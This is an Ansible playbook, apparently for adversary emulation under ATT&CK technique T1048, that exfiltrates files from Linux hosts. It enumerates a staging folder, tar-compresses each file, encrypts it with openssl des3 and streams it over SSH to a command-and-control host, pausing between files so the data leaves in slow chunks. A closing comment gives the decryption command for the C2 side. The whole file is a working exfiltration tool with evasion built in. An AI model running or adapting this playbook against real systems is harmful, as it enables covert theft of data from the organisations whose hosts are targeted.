
# Playbook-T1048-Chunk
- name : Exfiltration Over Alternative Protocol in chunk over time
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: Ansible check directory exists example.
      tags: always
      stat:
        path: "{{ exfiltration_folder }}"
      register: exfil_check
    - name: fail if exfil folder does not exist
      tags: always
      fail: msg="No Exfiltration folder, please run another playbook before this one"
      when: exfil_check.stat.exists == False
      
    - name: Grab files names form exfiltration_folder and exfl over SSH
      tags: always
      shell: "find . -maxdepth 1 -type f | cut -d'/' -f2"
      args:
        chdir: "{{ exfiltration_folder }}"
      register: exfil_files_list
    - debug:
        var: "exfil_files_list.stdout_lines"
        
    - name: exfl over SSH
      tags: always 
      shell: |
        pwd > /tmp/path
        cd {{ exfiltration_folder }}
        tar czpf - {{ item }} | openssl des3 -salt -k {{ password_encryption }} | ssh {{ cnc_fqdn }} 'cat > {{ exfiltration_file }}-{{ item }}.tar.gz.enc'
        sleep {{ exfil_delay }}
      with_items: "{{ exfil_files_list.stdout_lines }}"
# decrypt file on cnc: openssl des3 -d -salt -k {{ password_encryption }} -in {{ exfiltration_file }}.tar.gz.enc -out {{ exfiltration_file }}tar.gz    
